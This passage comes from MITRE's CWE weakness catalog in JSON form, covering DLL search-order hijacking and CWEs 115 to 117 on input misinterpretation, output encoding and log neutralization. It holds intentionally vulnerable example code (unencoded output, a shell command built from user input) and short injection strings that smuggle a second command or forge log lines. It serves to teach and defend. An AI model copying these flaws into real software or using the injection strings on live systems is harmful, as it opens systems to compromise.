validate the value read from the environment, if an attacker can control the value of APPHOME, they can fool the application into running malicious code."},{"Intro_Text":"The following code is from a web-based administration utility that allows users access to an interface through which they can update their profile on the system. The utility makes use of a library named liberty.dll, which is normally found in a standard system directory.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":"LoadLibrary(\\"liberty.dll\\");"},"Body_Text":"The problem is that the program does not specify an absolute path for liberty.dll. If an attacker is able to place a malicious library named liberty.dll higher in the search order than file the application intends to load, then the application will load the malicious copy instead of the intended file. Because of the nature of the application, it runs with elevated privileges, which means the contents of the attacker\'s liberty.dll will now be run with elevated privileges, possibly giving the attacker complete control of the system. The type of attack seen in this example is made possible because of the search order used by LoadLibrary() when an absolute path is not specified. If the current directory is searched before system directories, as was the case up until the most recent versions of Windows, then this type of attack becomes trivial if the attacker can execute the program locally. The search order is operating system version dependent, and is controlled on newer operating systems by the value of the registry key: HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Session Manager\\\\SafeDllSearchMode"}]},"Affected_Resources":{"Affected_Resource":"System Process"},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Process Control"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"108"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Notes":{"Note":{"#text":"CWE-114 is a Class, but it is listed a child of CWE-73 in view 1000. This suggests some abstraction problems that should be resolved in future versions.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"}]}},"115":{"attr":{"@_ID":"115","@_Name":"Misinterpretation of Input","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software misinterprets an input, whether from an attacker or another product, in a security-relevant fashion.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"436","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-2225","Description":"Product sees dangerous file extension in free text of a group discussion, disconnects all users.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2225"},{"Reference":"CVE-2001-0003","Description":"Product does not correctly import and process security settings from another product.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0003"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Misinterpretation Error"}},"Notes":{"Note":{"#text":"This concept needs further study. It is likely a factor in several weaknesses, possibly resultant as well. Overlaps Multiple Interpretation Errors (MIE).","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Time_of_Introduction"}],"Previous_Entry_Name":{"#text":"Misinterpretation Error","attr":{"@_Date":"2008-04-11"}}}},"116":{"attr":{"@_ID":"116","@_Name":"Improper Encoding or Escaping of Output","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software prepares a structured message for communication with another component, but encoding or escaping of the data is either missing or done incorrectly. As a result, the intended structure of the message is not preserved.","Extended_Description":{"xhtml:p":["Improper encoding or escaping can allow attackers to change the commands that are sent to another component, inserting malicious commands instead.","Most software follows a certain protocol that uses structured messages for communication between components, such as queries or commands. These structured messages can contain raw data interspersed with metadata or control information. For example, \\"GET /index.html HTTP/1.1\\" is a structured message containing a command (\\"GET\\") with a single argument (\\"/index.html\\") and metadata about which protocol version is being used (\\"HTTP/1.1\\").","If an application uses attacker-supplied inputs to construct a structured message without properly encoding or escaping, then the attacker could insert special characters that will cause the data to be interpreted as control information or metadata. Consequently, the component that receives the output will perform the wrong operations, or otherwise interpret the data incorrectly."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"707","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"74","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Often"}},"Technology":[{"attr":{"@_Name":"Database Server","@_Prevalence":"Often"}},{"attr":{"@_Name":"Web Server","@_Prevalence":"Often"}}]},"Alternate_Terms":{"Alternate_Term":[{"Term":"Output Sanitization"},{"Term":"Output Validation"},{"Term":"Output Encoding"}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Application Data","Note":"The communications between components can be modified in unexpected ways. Unexpected commands can be executed, bypassing other security mechanisms. Incoming data can be misinterpreted."},{"Scope":["Integrity","Confidentiality","Availability","Access Control"],"Impact":"Execute Unauthorized Code or Commands","Note":"The communications between components can be modified in unexpected ways. Unexpected commands can be executed, bypassing other security mechanisms. Incoming data can be misinterpreted."},{"Scope":"Confidentiality","Impact":"Bypass Protection Mechanism","Note":"The communications between components can be modified in unexpected ways. Unexpected commands can be executed, bypassing other security mechanisms. Incoming data can be misinterpreted."}]},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-1"},"Method":"Automated Static Analysis","Description":"This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives.","Effectiveness":"Moderate","Effectiveness_Notes":"This is not a perfect solution, since 100% accuracy and coverage are not feasible."},{"attr":{"@_Detection_Method_ID":"DM-2"},"Method":"Automated Dynamic Analysis","Description":"This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results."}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-4.3"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","For example, consider using the ESAPI Encoding control [REF-45] or a similar tool, library, or framework. These will help the programmer encode outputs in a manner less prone to error.","Alternately, use built-in functions, but consider using wrappers in case those functions are discovered to have a vulnerability."]}},{"attr":{"@_Mitigation_ID":"MIT-27"},"Phase":"Architecture and Design","Strategy":"Parameterization","Description":{"xhtml:p":["If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated.","For example, stored procedures can enforce database query structure and reduce the likelihood of SQL injection."]}},{"Phase":["Architecture and Design","Implementation"],"Description":"Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies."},{"Phase":"Architecture and Design","Description":"In some cases, input validation may be an important strategy when output encoding is not a complete solution. For example, you may be providing the same output that will be processed by multiple consumers that use different encodings or representations. In other cases, you may be required to allow user-supplied input to contain control information, such as limited HTML tags that support formatting in a wiki or bulletin board. When this type of requirement must be met, use an extremely strict allowlist to limit which control sequences can be used. Verify that the resulting syntactic structure is what you expect. Use your normal encoding methods for the remainder of the input."},{"Phase":"Architecture and Design","Description":"Use input validation as a defense-in-depth measure to reduce the likelihood of output encoding errors (see CWE-20)."},{"Phase":"Requirements","Description":"Fully specify which encodings are required by components that will be communicating with each other."},{"Phase":"Implementation","Description":"When exchanging data between components, ensure that both components are using the same character encoding. Ensure that the proper encoding is applied at each interface. Explicitly set the encoding you are using whenever the protocol allows you to do so."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"This code displays an email address that was submitted as part of a form.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"JSP"},"xhtml:div":{"#text":"&lt;% String email = request.getParameter(\\"email\\"); %&gt;...Email Address: &lt;%= email %&gt;","xhtml:br":["",""]}},"Body_Text":"The value read from the form parameter is reflected back to the client browser without having been encoded prior to output, allowing various XSS attacks (CWE-79)."},{"Intro_Text":"Consider a chat application in which a front-end web application communicates with a back-end server. The back-end is legacy code that does not perform authentication or authorization, so the front-end must implement it. The chat protocol supports two commands, SAY and BAN, although only administrators can use the BAN command. Each argument must be separated by a single space. The raw inputs are URL-encoded. The messaging protocol allows multiple commands to be specified on the same line if they are separated by a \\"|\\" character.","Body_Text":["First let\'s look at the back end command processor code","The front end web application receives a command, encodes it for sending to the server, performs the authorization check, and sends the command to the server.","It is clear that, while the protocol and back-end allow multiple commands to be sent in a single request, the front end only intends to send a single command. However, the UrlEncode function could leave the \\"|\\" character intact. If an attacker provides:","then the front end will see this is a \\"SAY\\" command, and the $argstr will look like \\"hello world | BAN user12\\". Since the command is \\"SAY\\", the check for the \\"BAN\\" command will fail, and the front end will send the URL-encoded command to the back end:","The back end, however, will treat these as two separate commands:","Notice, however, that if the front end properly encodes the \\"|\\" with \\"%7C\\", then the back end will only process a single command."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"$inputString = readLineFromFileHandle($serverFH);@commands = split(/\\\\|/, $inputString);foreach $cmd (@commands) {}","xhtml:br":["","","","",""],"xhtml:i":"# generate an array of strings separated by the \\"|\\" character.","xhtml:div":{"#text":"($operator, $args) = split(/ /, $cmd, 2);$args = UrlDecode($args);if ($operator eq \\"BAN\\") {}elsif ($operator eq \\"SAY\\") {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","",""],"xhtml:i":"# separate the operator from its arguments based on a single whitespace","xhtml:div":[{"#text":"ExecuteBan($args);","attr":{"@_style":"margin-left:10px;"}},{"#text":"ExecuteSay($args);","attr":{"@_style":"margin-left:10px;"}}]}}},{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"$inputString = GetUntrustedArgument(\\"command\\");($cmd, $argstr) = split(/\\\\s+/, $inputString, 2);$argstr =~ s/\\\\s+/ /gs;$argstr = UrlEncode($argstr);if (($cmd eq \\"BAN\\") &amp;&amp; (! IsAdministrator($username))) {}$fh = GetServerFileHandle(\\"myserver\\");print $fh \\"$cmd $argstr\\\\n\\";","xhtml:br":["","","","","","","","","","","",""],"xhtml:i":["# removes extra whitespace and also changes CRLF\'s to spaces","# communicate with file server using a file handle"],"xhtml:div":{"#text":"die \\"Error: you are not the admin.\\\\n\\";","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"attack"},"xhtml:div":"SAY hello world|BAN user12"},{"attr":{"@_Nature":"result"},"xhtml:div":"SAY hello%20world|BAN%20user12"},{"attr":{"@_Nature":"result"},"xhtml:div":{"#text":"SAY hello worldBAN user12","xhtml:br":""}}]},{"Intro_Text":"This example takes user input, passes it through an encoding scheme and then creates a directory specified by the user.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"sub GetUntrustedInput {}sub encode {}sub doit {}","xhtml:div":[{"#text":"return($ARGV[0]);","attr":{"@_style":"margin-left:10px;"}},{"#text":"my($str) = @_;$str =~ s/\\\\&amp;/\\\\&amp;amp;/gs;$str =~ s/\\\\\\"/\\\\&amp;quot;/gs;$str =~ s/\\\\\'/\\\\&amp;apos;/gs;$str =~ s/\\\\&lt;/\\\\&amp;lt;/gs;$str =~ s/\\\\&gt;/\\\\&amp;gt;/gs;return($str);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","",""]},{"#text":"my $uname = encode(GetUntrustedInput(\\"username\\"));print \\"&lt;b&gt;Welcome, $uname!&lt;/b&gt;&lt;p&gt;\\\\n\\";system(\\"cd /home/$uname; /bin/ls -l\\");","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]}],"xhtml:br":["","","",""]}},{"attr":{"@_Nature":"attack"},"xhtml:div":"\' pwd"}],"Body_Text":["The programmer attempts to encode dangerous characters, however the denylist for encoding is incomplete (CWE-184) and an attacker can still pass a semicolon, resulting in a chain with command injection (CWE-77).","Additionally, the encoding routine is used inappropriately with command execution. An attacker doesn\'t even need to insert their own semicolon. The attacker can instead leverage the encoding routine to provide the semicolon to separate the commands. If an attacker supplies a string of the form:","then the program will encode the apostrophe and insert the semicolon, which functions as a command separator when passed to the system function. This allows the attacker to complete the command injection."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2008-4636","Description":"OS command injection in backup software using shell metacharacters in a filename; correct behavior would require that this filename could not be changed.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4636"},{"Reference":"CVE-2008-0769","Description":"Web application does not set the charset when sending a page to a browser, allowing for XSS exploitation when a browser chooses an unexpected encoding.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0769"},{"Reference":"CVE-2008-0005","Description":"Program does not set the charset when sending a page to a browser, allowing for XSS exploitation when a browser chooses an unexpected encoding.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0005"},{"Reference":"CVE-2008-5573","Description":"SQL injection via password parameter; a strong password might contain \\"&amp;\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5573"},{"Reference":"CVE-2008-3773","Description":"Cross-site scripting in chat application via a message subject, which normally might contain \\"&amp;\\" and other XSS-related characters.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3773"},{"Reference":"CVE-2008-0757","Description":"Cross-site scripting in chat application via a message, which normally might be allowed to contain arbitrary content.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0757"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":22,"Entry_Name":"Improper Output Handling"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"IDS00-J","Entry_Name":"Sanitize untrusted data passed across a trust boundary","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"IDS05-J","Entry_Name":"Use a subset of ASCII for file and path names"},{"attr":{"@_Taxonomy_Name":"SEI CERT Oracle Coding Standard for Java"},"Entry_ID":"IDS00-J","Entry_Name":"Prevent SQL injection","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"IDS33-PL","Entry_Name":"Sanitize untrusted data passed across a trust boundary","Mapping_Fit":"Exact"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"104"}},{"attr":{"@_CAPEC_ID":"73"}},{"attr":{"@_CAPEC_ID":"81"}},{"attr":{"@_CAPEC_ID":"85"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-45"}},{"attr":{"@_External_Reference_ID":"REF-46"}},{"attr":{"@_External_Reference_ID":"REF-47"}},{"attr":{"@_External_Reference_ID":"REF-48"}},{"attr":{"@_External_Reference_ID":"REF-49"}},{"attr":{"@_External_Reference_ID":"REF-50"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 11, &#34;Canonical Representation Issues&#34; Page 363"}}]},"Notes":{"Note":[{"#text":"This weakness is primary to all weaknesses related to injection (CWE-74) since the inherent nature of injection involves the violation of structured messages.","attr":{"@_Type":"Relationship"}},{"attr":{"@_Type":"Relationship"},"xhtml:p":["CWE-116 and CWE-20 have a close association because, depending on the nature of the structured message, proper input validation can indirectly prevent special characters from changing the meaning of a structured message. For example, by validating that a numeric ID field should only contain the 0-9 characters, the programmer effectively prevents injection attacks.","However, input validation is not always sufficient, especially when less stringent data types must be supported, such as free-form text. Consider a SQL injection scenario in which a last name is inserted into a query. The name \\"O\'Reilly\\" would likely pass the validation step since it is a common last name in the English language. However, it cannot be directly inserted into the database because it contains the \\"\'\\" apostrophe character, which would need to be escaped or otherwise neutralized. In this case, stripping the apostrophe might reduce the risk of SQL injection, but it would produce incorrect behavior because the wrong name would be recorded."]},{"#text":"The usage of the \\"encoding\\" and \\"escaping\\" terms varies widely. For example, in some programming languages, the terms are used interchangeably, while other languages provide APIs that use both terms for different tasks. This overlapping usage extends to the Web, such as the \\"escape\\" JavaScript function whose purpose is stated to be encoding. The concepts of encoding and escaping predate the Web by decades. Given such a context, it is difficult for CWE to adopt a consistent vocabulary that will not be misinterpreted by some constituency.","attr":{"@_Type":"Terminology"}},{"#text":"This is a data/directive boundary error in which data boundaries are not sufficiently enforced before it is sent to a different control sphere.","attr":{"@_Type":"Theoretical"}},{"#text":"While many published vulnerabilities are related to insufficient output encoding, there is such an emphasis on input validation as a protection mechanism that the underlying causes are rarely described. Within CVE, the focus is primarily on well-understood issues like cross-site scripting and SQL injection. It is likely that this weakness frequently occurs in custom protocols that support multiple encodings, which are not necessarily detectable with automated techniques.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-07-19","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Likelihood_of_Exploit, Name, Observed_Examples, Potential_Mitigations, References, Relationship_Notes, Relationships, Research_Gaps, Terminology_Notes, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Detection_Factors, Potential_Mitigations, References, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationship_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Likelihood_of_Exploit, References, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships, Terminology_Notes"}],"Previous_Entry_Name":[{"#text":"Output Validation","attr":{"@_Date":"2008-04-11"}},{"#text":"Incorrect Output Sanitization","attr":{"@_Date":"2008-09-09"}},{"#text":"Insufficient Output Sanitization","attr":{"@_Date":"2009-01-12"}}]}},"117":{"attr":{"@_ID":"117","@_Name":"Improper Output Neutralization for Logs","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not neutralize or incorrectly neutralizes output that is written to logs.","Extended_Description":{"xhtml:p":["This can allow an attacker to forge log entries or inject malicious content into logs.","Log forging vulnerabilities occur when:"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ol":{"xhtml:li":["Data enters an application from an untrusted source.","The data is written to an application or system log file."]}}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"116","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":"Applications typically use log files to store a history of events or transactions for later review, statistics gathering, or debugging. Depending on the nature of the application, the task of reviewing log files may be performed manually on an as-needed basis or automated with a tool that automatically culls logs for important events or trending information."},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality","Availability","Non-Repudiation"],"Impact":["Modify Application Data","Hide Activities","Execute Unauthorized Code or Commands"],"Note":"Interpretation of the log files may be hindered or misdirected if an attacker can supply data to the application that is subsequently logged verbatim. In the most benign case, an attacker may be able to insert false entries into the log file by providing the application with input that includes appropriate characters. Forged or otherwise corrupted log files can be used to cover an attacker\'s tracks, possibly by skewing statistics, or even to implicate another party in the commission of a malicious act. If the log file is processed automatically, the attacker can render the file unusable by corrupting the format of the file or injecting unexpected characters. An attacker may inject code or other commands into the log file and take advantage of a vulnerability in the log processing utility."}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-30"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following web application code attempts to read an integer value from a request object. If the parseInt call fails, then the input is logged with an error message indicating what happened.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String val = request.getParameter(\\"val\\");try {}catch (NumberFormatException) {}...","xhtml:br":["","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int value = Integer.parseInt(val);","xhtml:br":""}},{"#text":"log.info(\\"Failed to parse val = \\" + val);","attr":{"@_style":"margin-left:10px;"}}]}},"Body_Text":["If a user submits the string \\"twenty-one\\" for val, the following entry is logged:",{"xhtml:ul":{"xhtml:li":{"xhtml:div":"INFO: Failed to parse val=twenty-one"}}},"However, if an attacker submits the string \\"twenty-one%0a%0aINFO:+User+logged+out%3dbadguy\\", the following entry is 